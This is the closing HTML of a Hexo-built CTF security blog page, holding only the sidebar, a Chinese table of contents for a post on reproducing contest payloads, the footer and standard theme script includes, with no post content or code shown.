  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">star</p>
              <p class="site-description motion-element" itemprop="description">ctf wp and technologies about security</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%20%7C%7C%20archive">
              
                  <span class="site-state-item-count">27</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">27</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#赛后针对payload的一些复现和思考"><span class="nav-number">2.</span> <span class="nav-text">赛后针对payload的一些复现和思考</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#小小的反思"><span class="nav-number">3.</span> <span class="nav-text">小小的反思</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考"><span class="nav-number">4.</span> <span class="nav-text">参考</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">star</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
